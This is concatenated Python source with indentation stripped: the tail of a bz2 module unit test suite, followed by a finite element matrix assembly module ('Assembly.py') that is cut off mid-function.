def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
Assembly.py
|
from __future__ import print_function
import gc, os, sys
from copy import deepcopy
from warnings import warn
from time import time
import numpy as np
from scipy.sparse import coo_matrix, csc_matrix, csr_matrix
from ._LowLevelAssembly_ import _LowLevelAssembly_, _LowLevelAssemblyExplicit_, _LowLevelAssemblyLaplacian_
from ._LowLevelAssembly_ import _LowLevelAssembly_Par_, _LowLevelAssemblyExplicit_Par_
from .SparseAssemblyNative import SparseAssemblyNative, SparseAssemblyNativeCSR, SparseAssemblyNativeCSR_RecomputeDataIndex
from .RHSAssemblyNative import RHSAssemblyNative
from .ComputeSparsityPattern import ComputeSparsityPattern
# PARALLEL PROCESSING ROUTINES
import multiprocessing
import Florence.ParallelProcessing.parmap as parmap
__all__ = ['Assemble', 'AssembleForces', 'AssembleExplicit', 'AssembleMass', 'AssembleForm', 'AssembleFollowerForces']
def Assemble(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition):
if fem_solver.has_low_level_dispatcher:
return LowLevelAssembly(fem_solver, function_spaces[0], formulation, mesh, material, Eulerx, Eulerp)
else:
if mesh.nelem <= 600000:
return AssemblySmall(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition)
elif mesh.nelem > 600000:
print("Larger than memory system. Dask on disk parallel assembly is turned on")
return OutofCoreAssembly(fem_solver, function_spaces[0], formulation, mesh, material, Eulerx, Eulerp)
def LowLevelAssembly(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
t_assembly = time()
if not material.has_low_level_dispatcher:
raise RuntimeError("Cannot dispatch to low level module since material {} does not support it".format(type(material).__name__))
if formulation.fields == "electrostatics":
stiffness, T = _LowLevelAssemblyLaplacian_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
fem_solver.assembly_time = time() - t_assembly
return stiffness, T[:,None], None, None
# HACK TO DISPATCH TO EFFICIENT MASS MATRIX COMUTATION
ll_failed = False
M = []
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
try:
t_mass_assembly = time()
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
if M is not None:
fem_solver.is_mass_computed = True
t_mass_assembly = time() - t_mass_assembly
print("Assembled mass matrix. Time elapsed was {} seconds".format(t_mass_assembly))
except ImportError:
# CONTINUE DOWN
warn("Low level mass assembly not available. Falling back to python version")
ll_failed = True
if fem_solver.parallel:
stiffness, T, F, mass = ImplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
else:
stiffness, T, F, mass = _LowLevelAssembly_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
if isinstance(F,np.ndarray):
F = F[:,None]
# SET FLAG AGAIN - NECESSARY
if ll_failed:
if mass is not None:
fem_solver.is_mass_computed = True
else:
mass = M
fem_solver.assembly_time = time() - t_assembly
return stiffness, T[:,None], F, mass
def AssemblySmall(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition):
t_assembly = time()
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
ndof = nodeperelem*nvar
local_capacity = ndof*ndof
if fem_solver.recompute_sparsity_pattern is False:
indices, indptr = fem_solver.indices, fem_solver.indptr
if fem_solver.squeeze_sparsity_pattern is False:
data_global_indices = fem_solver.data_global_indices
data_local_indices = fem_solver.data_local_indices
if fem_solver.recompute_sparsity_pattern:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF STIFFNESS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
else:
V_stiffness=np.zeros(indices.shape[0],dtype=np.float64)
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
V_mass=np.zeros(indices.shape[0],dtype=np.float64)
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
mass, F = [], []
if fem_solver.has_moving_boundary:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
if fem_solver.parallel:
# COMPUATE ALL LOCAL ELEMENTAL MATRICES (STIFFNESS, MASS, INTERNAL & EXTERNAL TRACTION FORCES)
ParallelTuple = parmap.map(formulation,np.arange(0,nelem,dtype=np.int32),
function_spaces[0], mesh, material, fem_solver, Eulerx, Eulerp, processes= int(multiprocessing.cpu_count()/2))
for elem in range(nelem):
if fem_solver.parallel:
# UNPACK PARALLEL TUPLE VALUES
I_stiff_elem = ParallelTuple[elem][0]; J_stiff_elem = ParallelTuple[elem][1]; V_stiff_elem = ParallelTuple[elem][2]
t = ParallelTuple[elem][3]; f = ParallelTuple[elem][4]
I_mass_elem = ParallelTuple[elem][5]; J_mass_elem = ParallelTuple[elem][6]; V_mass_elem = ParallelTuple[elem][6]
else:
# COMPUATE ALL LOCAL ELEMENTAL MATRICES (STIFFNESS, MASS, INTERNAL & EXTERNAL TRACTION FORCES )
I_stiff_elem, J_stiff_elem, V_stiff_elem, t, f, \
I_mass_elem, J_mass_elem, V_mass_elem = formulation.GetElementalMatrices(elem,
function_spaces[0], mesh, material, fem_solver, Eulerx, Eulerp)
if fem_solver.recompute_sparsity_pattern:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
SparseAssemblyNative(I_stiff_elem,J_stiff_elem,V_stiff_elem,I_stiffness,J_stiffness,V_stiffness,
elem,nvar,nodeperelem,mesh.elements)
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
SparseAssemblyNative(I_mass_elem,J_mass_elem,V_mass_elem,I_mass,J_mass,V_mass,
elem,nvar,nodeperelem,mesh.elements)
else:
if fem_solver.squeeze_sparsity_pattern:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
SparseAssemblyNativeCSR_RecomputeDataIndex(mesh,V_stiff_elem,indices,indptr,V_stiffness,elem,nvar)
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
SparseAssemblyNativeCSR_RecomputeDataIndex(mesh,V_mass_elem,indices,indptr,V_mass,elem,nvar)
else:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
V_stiffness[data_global_indices[elem*local_capacity:(elem+1)*local_capacity]] \
+= V_stiff_elem[data_local_indices[elem*local_capacity:(elem+1)*local_capacity]]
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
V_mass[data_global_indices[elem*local_capacity:(elem+1)*local_capacity]] \
+= V_mass_elem[data_local_indices[elem*local_capacity:(elem+1)*local_capacity]]
#if fem_solver.has_moving_boundary:
# RHS ASSEMBLY
# for iterator in range(0,nvar):
# F[mesh.elements[elem,:]*nvar+iterator,0]+=f[iterator::nvar,0]
#RHSAssemblyNative(F,f,elem,nvar,nodeperelem,mesh.elements)
# INTERNAL TRACTION FORCE ASSEMBLY
# for iterator in range(0,nvar):
# T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
if fem_solver.parallel:
del ParallelTuple
gc.collect()
if fem_solver.recompute_sparsity_pattern:
stiffness = coo_matrix((V_stiffness,(I_stiffness,J_stiffness)),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64).tocsr()
# GET STORAGE/MEMORY DETAILS
fem_solver.spmat = stiffness.data.nbytes/1024./1024.
fem_solver.ijv = (I_stiffness.nbytes + J_stiffness.nbytes + V_stiffness.nbytes)/1024./1024.
del I_stiffness, J_stiffness, V_stiffness
gc.collect()
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
mass = csr_matrix((V_mass,(I_mass,J_mass)),shape=((nvar*mesh.points.shape[0],
nvar*mesh.points.shape[0])),dtype=np.float64)
fem_solver.is_mass_computed = True
else:
stiffness = csr_matrix((V_stiffness,indices,indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
# GET STORAGE/MEMORY DETAILS
fem_solver.spmat = stiffness.data.nbytes/1024./1024.
fem_solver.ijv = (indptr.nbytes + indices.nbytes + V_stiffness.nbytes)/1024./1024.
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
mass = csr_matrix((V_mass,indices,indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
fem_solver.is_mass_computed = True
if boundary_condition.applied_pressure is not None:
K_pressure, F_pressure = AssemblyFollowerForces(boundary_condition, mesh, material, function_spaces, fem_solver, Eulerx)
stiffness -= K_pressure
T -= F_pressure[:,None]
fem_solver.assembly_time = time() - t_assembly
return stiffness, T, F, mass
def OutofCoreAssembly(fem_solver, function_space, formulation, mesh, material,
Eulerx, Eulerp, calculate_rhs=True, filename=None, chunk_size=None):
"""Assembly routine for larger than memory system of equations.
Usage of h5py and dask allow us to store the triplets and build a sparse matrix out of
them on disk.
Note: The sparse matrix itfem_solver is created on the memory.
"""
import sys, os
from warnings import warn
from time import time
try:
import psutil
except ImportError:
has_psutil = False
raise ImportError("No module named psutil. Please install it using 'pip install psutil'")
# from Core.Supplementary.dsparse.sparse import dok_matrix
if fem_solver.parallel:
warn("Parallel assembly cannot performed on large arrays. \n"
"Out of core 'i.e. Dask' parallelisation is turned on instead. "
"This is an innocuous warning")
try:
import h5py
except ImportError:
has_h5py = False
raise ImportError('h5py is not installed. Please install it first by running "pip install h5py"')
try:
import dask.array as da
except ImportError:
has_dask = False
raise ImportError('dask is not installed. Please install it first by running "pip install toolz && pip install dask"')
if filename is None:
warn("filename not given. I am going to write the output in the current directory")
pwd = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(pwd,"output.hdf5")
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
# GET MEMORY INFO
memory = psutil.virtual_memory()
size_of_triplets_gbytes = (mesh.points.shape[0]*nvar)**2*nelem*(4)*(3)//1024**3
if memory.available//1024**3 > 2*size_of_triplets_gbytes:
warn("Out of core assembly is only efficient for larger than memory "
"system of equations. Using it on smaller matrices can be very inefficient")
hdf_file = h5py.File(filename,'w')
IJV_triplets = hdf_file.create_dataset("IJV_triplets",((nvar*nodeperelem)**2*nelem,3),dtype=np.float32)
# THE I & J VECTORS OF LOCAL STIFFNESS MATRIX DO NOT CHANGE, HENCE COMPUTE THEM ONCE
I_stiff_elem = np.repeat(np.arange(0,nvar*nodeperelem),nvar*nodeperelem,axis=0)
J_stiff_elem = np.tile(np.arange(0,nvar*nodeperelem),nvar*nodeperelem)
I_mass=[];J_mass=[];V_mass=[]; I_mass_elem = []; J_mass_elem = []
if calculate_rhs is False:
F = []
T = []
else:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
# ASSIGN OTHER NECESSARY MATRICES
full_current_row_stiff = []; full_current_column_stiff = []; coeff_stiff = []
full_current_row_mass = []; full_current_column_mass = []; coeff_mass = []
mass = []
gc.collect()
print('Writing the triplets to disk')
t_hdf5 = time()
for elem in range(nelem):
full_current_row_stiff, full_current_column_stiff, coeff_stiff, t, f, \
full_current_row_mass, full_current_column_mass, coeff_mass = GetElementalMatrices(elem,
MainData,mesh.elements,mesh.points,nodeperelem,Eulerx,TotalPot,I_stiff_elem,J_stiff_elem,I_mass_elem,J_mass_elem)
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),0] = full_current_row_stiff.flatten()
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),1] = full_current_column_stiff.flatten()
IJV_triplets[(nvar*nodeperelem)**2*elem:(nvar*nodeperelem)**2*(elem+1),2] = coeff_stiff.flatten()
if calculate_rhs is True:
if MainData.Analysis != 'Static':
# SPARSE ASSEMBLY - MASS MATRIX
I_mass, J_mass, V_mass = SparseAssembly_Step_2(I_mass,J_mass,V_mass,full_current_row_mass,full_current_column_mass,coeff_mass,
nvar,nodeperelem,elem)
if MainData.AssemblyParameters.ExternalLoadNature == 'Nonlinear':
# RHS ASSEMBLY
for iterator in range(0,nvar):
F[mesh.elements[elem,:]*nvar+iterator,0]+=f[iterator::nvar]
# INTERNAL TRACTION FORCE ASSEMBLY
for iterator in range(0,nvar):
T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
if elem % 10000 == 0:
print("Processed ", elem, " elements")
hdf_file.close()
print('Finished writing the triplets to disk. Time taken', time() - t_hdf5, 'seconds')
print('Reading the triplets back from disk')
hdf_file = h5py.File(filename,'r')
if chunk_size is None:
chunk_size = mesh.points.shape[0]*nvar // 300
print('Creating dask array from triplets')
IJV_triplets = da.from_array(hdf_file['IJV_triplets'],chunks=(chunk_size,3))
print('Creating the sparse matrix')
t_sparse = time()
stiffness = csr_matrix((IJV_triplets[:,2].astype(np.float32),
(IJV_triplets[:,0].astype(np.int32),IJV_triplets[:,1].astype(np.int32))),
shape=((mesh.points.shape[0]*nvar,mesh.points.shape[0]*nvar)),dtype=np.float32)
print('Done creating the sparse matrix, time taken', time() - t_sparse)
hdf_file.close()
return stiffness, T, F, mass
#------------------------------- ASSEMBLY ROUTINE FOR EXTERNAL PRESSURE FORCES ----------------------------------#
def AssemblyFollowerForces(boundary_condition, mesh, material, function_spaces, fem_solver, Eulerx):
"""Compute/assemble surface follower forces"""
if boundary_condition.pressure_flags is None:
raise ValueError("Pressure boundary conditions are not set for the analysis")
ndim = mesh.InferSpatialDimension()
nvar = material.nvar
# FOLLOWER FORCES DEPEND OF THE DIRECTION OF THE FACE/SURFACE
if boundary_condition.pressure_flags.shape[0] == mesh.points.shape[0]:
boundary_condition.pressure_data_applied_at = "node"
raise ValueError("Follower forces applied at nodes. Follower forces should be applied at faces.")
# FUNCTION SPACES TO MAP THE SURFACE FORCE ALONG THE FACE OF THE ELEMENT
if not isinstance(function_spaces,tuple):
raise ValueError("Boundary functional spaces not available for computing pressure stiffness")
else:
# CHECK IF A FUNCTION SPACE FOR BOUNDARY EXISTS - SAFEGAURDS AGAINST FORMULATIONS THAT DO NO PROVIDE ONE
has_boundary_spaces = False
for fs in function_spaces:
if ndim == 3 and fs.ndim == 2:
has_boundary_spaces = True
break
elif ndim == 2 and fs.ndim == 1:
has_boundary_spaces = True
break
if not has_boundary_spaces:
from Florence import QuadratureRule, FunctionSpace
# COMPUTE BOUNDARY FUNCTIONAL SPACES
p = mesh.InferPolynomialDegree()
bquadrature = QuadratureRule(optimal=3, norder=2*p+1,
mesh_type=mesh.boundary_element_type, is_flattened=False)
bfunction_space = FunctionSpace(mesh.CreateDummyLowerDimensionalMesh(),
bquadrature, p=p, equally_spaced=mesh.IsEquallySpaced, use_optimal_quadrature=False)
function_spaces = (function_spaces[0],bfunction_space)
# COMPUTE AND ASSEMBLY OF THE SURFACE FOLLOWER FORCES
from .FollowerForces import FollowerForces
if boundary_condition.analysis_type == "static":
if fem_solver.recompute_sparsity_pattern:
I_stiffness, J_stiffness, V_stiffness, F = FollowerForces(boundary_condition, mesh, material, function_spaces[-1], fem_solver, Eulerx)
stiffness = coo_matrix((V_stiffness,(I_stiffness,J_stiffness)),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64).tocsr()
else:
V_stiffness, F = StaticForces(boundary_condition, mesh, material, function_spaces[-1], fem_solver, Eulerx)
stiffness = csr_matrix((V_stiffness,fem_solver.indices,fem_solver.indptr),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])))
elif boundary_condition.analysis_type == "dynamic":
raise ValueError("Follower forces implemented for dynamic problems.")
return stiffness, F
#----------------- ASSEMBLY ROUTINE FOR TRACTION FORCES ONLY - FOR MODIFIED NEWTON RAPHSON ----------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleInternalTractionForces(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
# T = np.zeros((mesh.points.shape[0]*nvar,1),np.float32)
for elem in range(nelem):
t = formulation.GetElementalMatrices(elem,
function_space, mesh, material, fem_solver, Eulerx, Eulerp)[3]
# INTERNAL TRACTION FORCE ASSEMBLY
# for iterator in range(0,nvar):
# T[mesh.elements[elem,:]*nvar+iterator,0]+=t[iterator::nvar,0]
RHSAssemblyNative(T,t,elem,nvar,nodeperelem,mesh.elements)
return T
#------------------------------- ASSEMBLY ROUTINE FOR EXTERNAL TRACTION FORCES ----------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleForces(boundary_condition, mesh, material, function_spaces, compute_traction_forces=True, compute_body_forces=False):
Ft = np.zeros((mesh.points.shape[0]*material.nvar,1))
Fb = np.zeros((mesh.points.shape[0]*material.nvar,1))
if compute_traction_forces:
Ft = AssembleExternalTractionForces(boundary_condition, mesh, material, function_spaces[-1])
if compute_body_forces:
Fb = AssembleBodyForces(boundary_condition, mesh, material, function_spaces[0])
return Ft + Fb
def AssembleExternalTractionForces(boundary_condition, mesh, material, function_space):
nvar = material.nvar
ndim = material.ndim
ngauss = function_space.AllGauss.shape[0]
if ndim == 2:
faces = mesh.edges
nodeperelem = mesh.edges.shape[1]
else:
faces = mesh.faces
nodeperelem = mesh.faces.shape[1]
if boundary_condition.is_applied_neumann_shape_functions_computed is False:
N = np.zeros((nodeperelem*nvar,nvar,ngauss))
for i in range(nvar):
N[i::nvar,i,:] = function_space.Bases
boundary_condition.__Nt__ = N
boundary_condition.is_applied_neumann_shape_functions_computed = True
else:
N = boundary_condition.__Nt__
F = np.zeros((mesh.points.shape[0]*nvar,1))
for face in range(faces.shape[0]):
if boundary_condition.neumann_flags[face] == True:
ElemTraction = boundary_condition.applied_neumann[face,:]
external_traction = np.einsum("ijk,j,k->ik",N,ElemTraction,function_space.AllGauss[:,0]).sum(axis=1)
RHSAssemblyNative(F,np.ascontiguousarray(external_traction[:,None]),face,nvar,nodeperelem,faces)
# nvar = material.nvar
# ndim = material.ndim
# if ndim == 2:
# faces = np.copy(mesh.edges)
